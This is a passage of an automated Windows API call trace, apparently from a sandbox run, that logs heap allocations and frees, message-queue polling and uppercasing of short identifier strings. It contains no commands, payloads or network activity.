(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.007] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0252.009] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.009] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0252.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0252.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0252.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.011] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0252.011] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0252.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0252.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.012] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.012] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.013] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.013] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0252.013] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.013] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.014] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0252.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.014] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.014] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.015] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.015] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.015] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.015] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.015] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0252.016] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.016] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0252.016] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.016] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.016] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.016] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.016] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.016] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.016] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.016] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.016] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.016] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.016] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.016] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.016] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.017] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.017] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.017] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.017] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.017] PeekMessageW (in: 